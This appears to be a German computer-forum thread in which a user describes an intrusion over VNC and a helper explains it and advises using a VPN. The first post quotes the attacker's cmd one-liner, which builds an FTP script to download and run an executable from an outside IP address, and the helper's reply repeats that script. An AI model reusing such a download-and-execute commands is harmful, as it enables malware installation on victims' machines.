Follow along with the video below to see how to install our site as a web app on your home screen.
Anmerkung: This feature currently requires accessing the site using the built-in Safari browser.
Du verwendest einen veralteten Browser. Es ist möglich, dass diese oder andere Websites nicht korrekt angezeigt werden. Du solltest ein Upgrade durchführen oder einen alternativen Browser verwenden.
Diskutiere Sicherheitslücke ??? im Sonstiges rund ums Internet Forum im Bereich Netzwerk & Internet; Hallo,
ich habe meinen Rechner neu aufgesetzt. Habe Antivir als Virenscanner, Spybot für die Registry und eine Firewall (extern). Unter anderem...
#1
S
schydhei
Mitglied
Themenersteller
Dabei seit
04.11.2007
Beiträge
5
Reaktionspunkte
0
Hallo,
ich habe meinen Rechner neu aufgesetzt. Habe Antivir als Virenscanner, Spybot für die Registry und eine Firewall (extern). Unter anderem habe ich VNC installiert, damit ich ich von draußen auf mein Rechner kann. Das Ganze natürlich Passwort geschützt. Die Anwendung habe ich auch in der Firewall konfiguriert.
Über Nacht habe ich meinen Rechner laufen lassen. Und siehe da irgendwas hat mein Ausführen geöffnet. Das ganze mehrfach mit folgendem Inhalt.
cmd /c echo open 90.128.78.22 3992 >> i &echo user mmokgp mmokgp >> i &echo get msoft42714.exe >> i &echo quit >> i &ftp -nv -s:i &msoft42714.exe &exit
Auch in der Ereignisanzeige konnte ich folgende einträge von VNC finden....
Connections: closed: 90.128.78.22::7896 (read: Connection reset by peer (10054)) oder Connections: accepted: 90.128.78.22::7896
Wer hat da was gemacht??? Fühle mich im Moment sehr ausspioniert !!!!
Hat jemand eine Ahnung ????
Gruß
Heiko
#2
E
Eddie
Bekanntes Mitglied
Dabei seit
04.02.2002
Beiträge
7.380
Reaktionspunkte
0
Als erstes würde ich mal nachsehen, ob ich eine msoft42714.exe auf meinem Rechner finde.
Wer immer auf Deinem Rechner war, hat eine Datei mit folgendem Inhalt angelegt:
Code:
open 90.128.78.22 3992
user mmokgp mmokgp
get msoft42714.exe
quit
Und diese per FTP ausführen lassen.
Die Datei i sollte unter C:\Dokumente und Einstellungen\Benutzername\ liegen. Diese wäre auch zu löschen.
Ansonsten würde ich sagen, konnte er alles mit Deinem Rechner machen, was er wollte.
IMHO wirst Du es nie erfahren.
Eddie
#3
S
schydhei
Mitglied
Themenersteller
Dabei seit
04.11.2007
Beiträge
5
Reaktionspunkte
0
:'( Wie verdammt hat er das geschafft???? :tickedoff:
Für was habe ich denn eine Firewall. Das einzige was ich mir vorstelölen kann, wäre der Weg über VNC. Der ist aber Passwortgeschützt.
Verdammt........
Gruß
Heiko
#4
E
Eddie
Bekanntes Mitglied
Dabei seit
04.02.2002
Beiträge
7.380
Reaktionspunkte
0
Auch in der Ereignisanzeige konnte ich folgende einträge von VNC finden....
Connections: closed: 90.128.78.22::7896 (read: Connection reset by peer (10054)) oder Connections: accepted: 90.128.78.22::7896
Hier hast Du die Antwort, wie er das geschafft hat.
VNC ohne VPN zu nutzen ist schon sehr fahrlässig.
Eddie
#5
S
schydhei
Mitglied
Themenersteller
Dabei seit
04.11.2007
Beiträge
5
Reaktionspunkte
0
Das würde ja bedeuten, das er das Passwort geknackkt hat, oder gibt es andere Möglichkeiten über VNC reinzukommen.
Gruß
#6
E
Eddie
Bekanntes Mitglied
Dabei seit
04.02.2002
Beiträge
7.380
Reaktionspunkte
0
Möglich ist Vieles.
Informier Dich doch mal beim Anbieter Deiner VNC Lösung über Updates.
Vielleicht war auch einfach das Passwort zu schlecht gewählt.
Eddie
#7
S
schydhei
Mitglied
Themenersteller
Dabei seit
04.11.2007
Beiträge
5
Reaktionspunkte
0
OK, ich bin ja lernfähig... Daraus habe ich bestimmt gelernt. Warscheinlich werde ich nicht herrausfinden wie er ohne Passwort auf mein Rechner zugreifen konnte.
Über VPN einen Tunnel aufzubauen wäre mit Sicherheit sicherer. Das bedeutet aber doch , das ich von jedem Rechner aus von dem ich auf den Rechner zuhause zugreifen möchte eine Software installieren muss. Also das müsste ich mir mal genauer erklären lassen. Hat da jemand mal Zeit und mir erklären könnte wie ich sowas mit welcher Software aufsetze? :-\
Gruß
Heiko[br][br]Erstellt am: 04.11.07 um 19:02:26
[br]
Eddie schrieb:
Möglich ist Vieles.
Informier Dich doch mal beim Anbieter Deiner VNC Lösung über Updates.
Vielleicht war auch einfach das Passwort zu schlecht gewählt.
Das Passwort besteht aus Groß und Kleinschreibung, verbunden mit einer Zahl und hat über 10Zeichen. Bei Ebay z.B. wir das Passwort als sehr Sicher gekennzeichnet.